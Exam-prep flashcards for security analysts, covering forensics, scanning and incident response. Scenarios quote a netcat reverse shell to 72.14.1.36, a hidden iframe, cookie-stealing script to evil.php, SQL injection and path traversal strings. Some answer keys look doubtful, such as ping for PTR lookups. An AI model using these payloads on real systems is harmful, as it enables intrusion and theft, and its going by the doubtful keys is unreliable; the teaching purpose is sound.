Study Guide Flashcards
Which of the following command line utilities would an analyst use on an end-user PC to determine the parts it is listening on? A tracert B ping C nslookup D netstat
netstat
An employee has been terminated for providing company confidential information to an outside party. The employee should not have had access to this information as part of the employee’s normal job function. Human resources has asked the security analyst to take possession of the computer and provide a copy of this hard drive to law enforcement, who will conduct a forensic investigation to look for information to help determine if they can bring criminal charges against the former employee. Which of the following steps should be taken when making a copy of the hard drive to provide to law enforcement? A Make a copy of the hard drive using a write blocker to image the disk to forensically prepared media. B Degauss the hard drive and then copy to a hard drive of at least equivalent size using ITFS formatting. C Log onto the computer with administrator privileges, and copy the hard drive to an external storage device. D Provide the hard drive to law enforcement to conduct the forensic exam directly on the original hard drive.
A Make a copy of the hard drive using a write blocker to image the disk to forensically prepared media
Which of the following is a vulnerability when using window as a host OS for virtual machines? A Window requires frequent patching. B Windows virtualized environments are typically unstable. C Windows requires hundreds of open firewall ports to operate. D Windows is vulnerable to the “ping of death”.
A Window requires frequent patching.
A security analyst received an alert from the antivirus software identifying a complex instance of malware on a company’s network. The company does not have the resources to fully analyze the malware and determine its effect on the system. Which of the following is the BEST action to take in the incident recovery and post-incident response process? A Wipe hard drives, reimage the system, and return the affected systems to ready state. B Direct and analyze he precursors and indicators; schedule a lessons learned meeting. C Remove the malware and inappropriate materials; eradicate the incident. D Perform event correlation; create a log retention policy.
A Wipe hard drives, reimage the system, and return the affected systems to ready state.
The security team has determined that the current incident response resources cannot meet management’s objective to secure a forensic image for all serious security incidents within 24 hours. Which of the following compensation controls can be used to help meet management’s expectations? A Separation of duties B Scheduled reviews C Dual control D Outsourcing
D Outsourcing
An organization has had problems with security teams remediating vulnerabilities that are either false positives or are not applicable to the organization’s server. Management has put emphasis on security teams conducting details analysis and investigation before conducting any remediation. The output from a recent Apache web server scan is shown below:s —- Scan Host: 192.168.1.18 15-Jan-16 10:12:10.1 PDT Vulnerability CVE-2006-5752 Cross-site scripting (XSS) vulnerability in the mod_status module of Apache server (httpd), when ExtendedStatus is enabled and a public-server-status page is used, allows remote attackers to inject arbitrary web script or HTML. Severity: 4.3 (medium) — The team performs some investigation and finds the statement from Apache on 07/02/2008. “Fixed in Apache HTTP server 2.2.6, 2.0.61, and 1.3.39” Which of the following conditions would require the team to perform remediation on this finding? A The organization is running version 2.2.6 and has ExtendedStatus enabled. B The organization is running version 2.0.59 and is not using a public-server-status page. C The organization is running version 1.3.39 and is using a public-sever-status page. D The organization is running version 2.0.5 and has ExtendedStatus enabled.
D The organization is running version 2.0.5 and has ExtendedStatus enabled.
A new security manager was hired to establish a vulnerability management program. The manager asked for a corporate strategic plan and risk register that the project management office developed. The manager conducted a tools and skill sets inventory to document the plan. Which of the following is a critical task for the establishment of a successful program? A Establish continuous monitoring B Update vulnerability feed C Perform information classification D Establish corporate policy
B Update vulnerability feed
Which of the following tools should an analyst use to scan for web server vulnerabilities? A Wireshark B Qualys C ArcSight D SolarWinds
B Qualys
An analyst preparing for a technical security compliance check on all Apache server. Which of the following will be the BEST to use? A CIS benchmark B Nagios C Untidy D Chain & Abel
A CIS benchmark
A technician is troubleshooting a desktop computer with low disk space. The technician reviews the following information snippets: Disk Allocation Report 350GB - C:\user1\movies\movies Network Stats Proto Local Address Foreign Address State TCP 0.0.0.0:8080 0.0.0.0 LISTENING movieDB TCP 192.168.1.10:8080 172.16.34.77:1200 TIME_WAIT Which of the following should the technician do the BEST resolve the issue based on the above information? (Select TWO) A Delete the movie\movies directory. B Disable the movieDB service. C Enable OS auto updates. D Install a file integrity tool. E Defragment the disk.
A Delete the movie\movies directory. B Disable the movieDB service.
A cybersecurity analyst was asked to review of web vulnerability scan logs. Given the following snippet of code: Iframe src=”http://65.240.22.1” width=”0” height=”0” franeborder=”0” tabindex=”-1” title=”empty” style=visibility:hidden;display:none /iframe Which of the following BEST describes the situation and recommendations to be made? A The security analyst has discovered an embedded iframe pointing to source IP 65.240.22.1 network. The code should include the domain name. Recommend the entry be updated with the domain name. B The security analyst has discovered an embedded iframe that is hidden from users accessing the web page. This code is correct. This is a design preference, and no vulnerabilities are present. C The security analyst has discovered an embedded iframe pointing to source IP 65.240.22.1 network. The link is hidden and suspicious. Recommend the entry be removed from the web page. D The security analyst has discovered an embedded iframe pointing to source IP 65.240.22.1 network. Recommend making the iframe visible. Fixing the code will correct the issue.
C The security analyst has discovered an embedded iframe pointing to source IP 65.240.22.1 network. The link is hidden and suspicious. Recommend the entry be removed from the web page.
A cybersecurity analyst is currently auditing a new Active Directory server for compliance. The analyst uses Nessus to do the initial scan, and Nessus reports the following: PluginID IP Port 10955 192.168.1.215 Microsoft-ds (445/tcp) 11210 192.168.1.215 Microsoft-ds (445/tcp) 12350 192.168.1.215 Netbus (35/udp) 12345 192.168.1.215 Ftp (21/tcp) Which of the following critical vulnerabilities has the analyst discovered? A Known backdoor B Zero-day C Path disclosure D User enumeration
A Known backdoor
Malicious users utilized brute force to access a system. An analyst is investigating these attacks and recommends methods to management that would help secure the system. Which of the following controls should the analyst recommend? (Select THREE). A Multifactor authentication B Network segmentation C Single sign-on D Encryption E Complexity policy F Biometrics G Obfuscation
A Multifactor authentication B Network segmentation E Complexity policy
A small company is publishing a new web application to receive customer feedback related to its products. The web server will only host a form to receive customer feedback and store it in a local database. The web server is placed in a DMZ network, and the web service and file system have been hardened. However, the cybersecurity analyst discover that data from the database can be mined from over the internet. Which of the following should the cybersecurity analyst recommend be done to provide temporary mitigation from unauthorized access to the database? A Configure the database to listen for incoming connections on the internet network. B Change the database connection string and apply necessary patches. C Configure an ACL in the border firewall to block all connections to the web server for ports different than 80 and 443. D Deploy a web application firewall to protect the web application from attacks to the database.
C Configure an ACL in the border firewall to block all connections to the web server
A security administrator uses FTK to take an image of a hard drive that is under investigation. Which of the following processes are used to ensure the image is the same as the original disk? (Select TWO). A Validate the folder and file directory listings on both. B Check the hash value between the image and the original. C Boot up the image and the original system to compare. D Connect a write blocker to the imaging device. E Copy the data to a disk of the same size and manufacturer
B Check the hash value between the image and the original. D Connect a write blocker to the imaging device.
A company’s IDP/DLP solution triggered the following alerts: A. 02/25-07:16:07.294705 SSH to Non-standard Port (TCP) 245.23.123.150:51533 -> 67.178.142.153:1234 B 02/25-08:16:24.637829 E-mail sent containing text pattern 9999 9999 9999 9999 (TCP) 192.168.123.150:36543 -> 209.34.13.163:25 C. 02/25-08:23:53.367782 Malformed DNS Packet, size exceeded (UDP) 192.168.84.150:45513 -> 172.16.32.12:53 D. 02/25-09:01:34.335672 XMAS packet detected (TCP) 192.168.233.18:61412 -> 172.16.15.233:445 E. 02/25-09:12:51.564607 Attempted FTP Connection, clear text auth (TCP) 192.168.12.45:47654 -> 172.16.222.12:21 Which of the following alerts should a security analyst investigate FIRST? A A B B C C D D E E
B
A threat intelligence analyst who is working on the SOC floor has been forwarded an email that was sent to one of the executives in business development. The executive mentions the email was from the Chief Executive Officer (CEO), who was requesting an emergency wire transfer. This request was unprecedented. Which of the following threats MOST accurately aligns with this behavior? A Phishing B Whaling C Spam D Ransomware
B Whaling
A security analyst is conducting traffic analysis and observes an HTTP POST to the company’s main web server. The POST header is approximately 1000 bytes in length. During transmission, one byte is delivered every ten seconds. Which of the following attacks is the traffic indicative of? A Exfiltration B DoS C Buffer overflow D SQL injection
A Exfiltration
A security analyst want to confirm a finding from a penetration test report on the internal web server. To do so, the analyst logs into the web server using SSH to send the request locally. The report provides a link to https://hrserver.internal/../etc/paswd. And the server IP address is 10.10.10.15 However, after several attempts, the analyst cannot get the file, despite attempting to get it using different ways, as shown below: Request Response https://hrserver.internal/../…/etc/paswd Host not found https://localhost/../…/etc/passwd File not found https://10.10.10.15/../…/etc/passwd File not found Which of the following would explain this problem? (Select TWO) A The web server uses SNI to check for a domain name. B Request can only be sent remotely to the web server C There is no local name resolution for hrserver internal D The password file is write protected E The web server has not started
A The web server uses SNI to check for a domain name. C There is no local name resolution for hrserver internal
A SIEM alert occurs with the following output: Mac IP Duration Logged on 01:23:45:33:89:cc 192.168.122.3 15 h gours Yes 01:23:45:33:89:cc 192.168.122.9 4 days Yes Which of the following BEST describe this alert? A The alert is a positive, there is a device with dual NICs. B The alert is valid because IP spoofing may be occurring on the network. C The alert is a false positive, both NICs are of the same brand. D The alert is valid because there may be rogue device on the network
D The alert is valid because there may be rogue device on the network
A company provides wireless connectivity to the internal network from all physical locations for company-owned devices. Users were able to connect the day before, but now all users have reported that when they connect to an access point in the conference room, they cannot access company resources. Which of the following BEST describes the cause of the problem? A The access point is blocking access by MAC address. Disable MAC address filtering. B The network is not available. Escalate the issue to network support. C Expired DNS entries exist on users devices. Request the affected users perform a DNS flush. D The access point is a rogue device. Follow incident response procedures.
D The access point is a rogue device. Follow incident response procedures.
An application contains the following log entries in a file named “authlog.log”. User ‘oidc-provider-fb:john’ successfully logged in 2016-01-01 23:00:01 User ‘local:Administrator’ successfully logged out 2016-01-01 23:00:05 User ‘oidc-provider-fb:kate’ successfully logged out 2016-01-01 23:00:07 A security analyst has been asked to parse the log file and print out all valid usernames. Which of the following achieves this task? A security analyst has been asked to parse the log file and print out all valid usernames. Which of the following achieves this task? A grep -e “successfully” authlog.log | awk ‘{print $2}’ | sed s/\’//g B cat authlog.log | grep “2016-01-01” | echo “valid username found: $2” C echo authlog.log > sed ‘s/User//’ | print “username exists: $user” D cat “authlog.log” | grep “User” | cut -F’ ‘ | “username exists: $1”
A grep -e “successfully” authlog.log | awk ‘{print $2}’ | sed s/\’//g
An organization has two environments: development and production. Development is where applications are developed with unit testing. The development environment has many configuration differences from the production environment. All applications are hosted on virtual machines. Vulnerability scans are performed against all systems before and after any application or configuration changes to any environment. Lately, vulnerability remediation activity has caused production applications to crash and behave unpredictably. Which of the following changes should be made to the current vulnerability management process? A Create a third environment between development and production that mirrors production and tests all changes before deployment to the user. B Refine testing in the development environment to include fuzzing and user acceptance testing so application are more stable before they migrate to production. C Create a second production environment by cloning the virtual machines, and if any stability problems occur, migrate user to the alternate production environment. D Refine testing in the production environment to include more exhaustive application stability testing while continuing to maintain the robust vulnerability remediation activities.
A Create a third environment between development and production that mirrors production and tests all changes before deployment to the user.
When reviewing the system log, the cybersecurity analyst noticed a suspicious log entry. Wmic /node:HRDepartment1 computersystem get username Which of the following combinations describes what occurred, and what action should be taken in this situation? A A rogue user has queried for users logged in remotely. Disable local access to network shares. B A rogue user has queried for the administrator logged into the system. Attempt to determine who executed the command. C A rogue user has queried for the administrator logged into the system. Disable local access to use cmd prompt. D A rogue user has queried for user logged in remotely. Attempt to determine who executed the command.
D A rogue user has queried for user logged in remotely. Attempt to determine who executed the command.
A security analyst is investigating the possible compromise of a production server for the company’s public-facing portal. The analyst runs a vulnerability scan againest the server and receives the following output: + Server: nginx/1.4.6 (Ubuntu) + The anti-clickjacking X-Frame-Options header is not present. + The x-xss-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGT Directories found (use ‘-c all’ to force check all the possible dirs) + Entry ‘/wp-admin/’ in robots.txt returned a non-forbidden or redirect HTTP code (302) + “Robots.txt” contains two entries that should be manually viewed. In some of the portal’s startup command files, the following command appears: Nc -e /bin/sh 72.14.1.36 4444 Investigating further, the analyst runs Netstat and obtains the following output: # netstat -an Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 *:443 *:* LISTEN tcp 0 52 *:59482 72.14.1.36:4444 ESTABLISHED tcp 0 0 *:80 *:* LISTEN Which of the following is the best step for the analyst to take NEXT? A Initiate the security incident response process. B Recommend training to avoid mistakes in production command files. C Delete the unknown files from the production servers. D Patch a new vulnerability that has been discovered E Manually review the robots.txt file for error
A Initiate the security incident response process.
A cybersecurity analyst wants to use a tool that prevents vulnerabilities in software from being successfully exploited. Which of the following tools can be implemented to achieve this goal? A HIPS B EMET C Helix D Nessus
A HIPS
Which of the following utilities could be used to resolve an IP address to a domain name, assuming the address has a PTR record? A ifconfig B ping C arp D nbtstat
B ping
Which of the following describes why it is important for an organization’s incident response team and legal department to meet and discuss communication processes during the incident response process? A To comply with existing organization policies and procedures on interacting with internal and external parties. B To insure all parties know their roles and effective lines of communication are established C To identify which group will communicate details to law enforcement in the event of a security incident D To predetermine what details should or should not be shared with internal or external parties in the event of an incident
B To insure all parties know their roles and effective lines of communication are established
During a physical penetration test at a client site, a local law enforcement officer stumbled upon the test and questioned the legitimacy of the team. Which of the following information should be shown to the officer? A Letter of engagement B Scope of work C Timing information D Team reporting
B Scope of work
A security administrator recently deployed a virtual honeynet. The honeynet is not protected by the company’s firewall, while all production network are protected by a stateful firewall. Which of the following would BEST allow an external penetration tester to determine which on is the honeynet’s network? A Banner grab B Packet analyzer C Fuzzer D TCP ACK scan
D TCP ACK scan
A security analyst is reviewing a report from the networking department that describes an increase in network utilization, which is causing network performance issues on some systems. A top talkers report over a five-minute sample is included. Source Destination Application Packets Volume (kbps) 8.4.4.100 172.16.1.25 SMTP 4386 6141 96.23.114.14 172.16.1.1 ITSec 7734 10827 172.16.1.101 100.15.25.34 HTTP 3412 4776 96.23.114.18 172.16.1.1 IPSec 2723 3812 172-16.1.101 100.15.25.34 SSL 8697 12176 172.16.1.222 203.67.121.12 Quicktime 1302 1822 172.16.1.197 113.121.12.15 8180/tcp 6045 8463 172.16.1.131 172.16.1.67 DHCP 25 35 172.16.1.25 172.16.1.53 DNS 66 93 Given the above output of the sample, which of the following should the security analyst accomplish FIRST to help track down the performance issues? A Perform reverse lookup on each of the IP addresses listed to help determine if the traffic is necessary. B Recommend that networking block the unneeded protocols such as Quicktime to clear up some of the congestion. C Put ACLs in place to restrict traffic destined for random or non-default application ports. D Quarantine the top talker on the network and begin to investigate any potential threats caused by the excessive traffic.
C Put ACLs in place to restrict traffic destined for random or non-default application ports.
During a quarterly review of user accounts and activity, a security analyst noticed that after a password reset the head of human resources has been logging in form multiple external locations, including several overseas. Further review of the account showed access right to a number of corporate applications, including a sensitive accounting application used for employee bonuses. Which of the following security methods could be used to mitigate this risk? A RADIUS identity management B Context-based authentication C Privilege escalation restrictions D Elimination of self-service password resets
B Context-based authentication
On which of the following organizational resources is the lack of an enabled password or PIN a common vulnerability? A. VDI systems B. Mobile devices C. Enterprise server Oss D. VPNs E. VoIP phones
B. Mobile devices
A security analyst has performed various scans and found vulnerabilities in several applications that affect production data. Remediation of all exploits may cause certain applications to no longer work. Which of the following activities would need to be conducted BEFORE remediation? A Fuzzing B Input validation C Change control D Sandboxing
C Change control
The SOC shift supervisor is looking through the administrator access logs for the key network devices. The supervisor notices there are no administrative access entries for the previous day, but knows IOS upgrades were scheduled on key network devices, according to the change control board notifications form the last shift logs. Which of the following is the MOST likely cause? A Someone cleared the log files to cover malicious activity. B Updates and upgrades were pushed out to a later date. C SNMP community string were changed in the upgrade process. D There were issues aggregating the individual log files into the administrator access logs.
A Someone cleared the log files to cover malicious activity.
A cybersecurity analyst is currently using Nessus to scan several FTP servers. Upon receiving the results of the scan, the analyst needs to further test to verify that the vulnerability found exits. The analyst uses the following snippet of code: Username: admin ‘ ; – Password : ‘ OR 1=1 – Which of the following vulnerabilities is the analyst checking for? A Buffer overflow B SQL injection C Default password D Format string attack
B SQL injection
The Chief Information Security Officer (CISO) has decided that all accounts with elevated privileges must use a longer, more complicated passphrase instead of a password. The CISO would like to formally document management’s intent to set this control level. Which of the following is the appropriate means to achieve this? A A control B A standard C A policy D A guideline
C - A policy
An analyst suspects large database that contains customer information and credit card data was exfiltrated to a known hacker group in a foreign country. Which of the following incident response steps should the analyst take FIRST. A Immediately notify law enforcement, as they may be able to help track down the hacker group before customer information is disseminated. B Draft and publish a notice on the company’s website about the incident, as PCI regulations require immediate disclosure in the case of a breach of PII or card data. C Isolate the server, restore the database to a time before the vulnerability occurred, and ensure the database is encrypted. D Document and verify all evidence and immediately notify the company’s Chief Information Security Officer (CISO) to better understand the next steps.
D Document and verify all evidence and immediately notify the company’s Chief Information Security Officer (CISO) to better understand the next steps.
Given the following code: var adr =”../evil.php?breadomonster=’ +escape{document.cookie}; var query = “SELECT * FROM users WHERE name=’smith’; Which of the following types of attacks is occurring? A Privilege escalation B XSS C Session hijacking D MITM E SQL injection
B XSS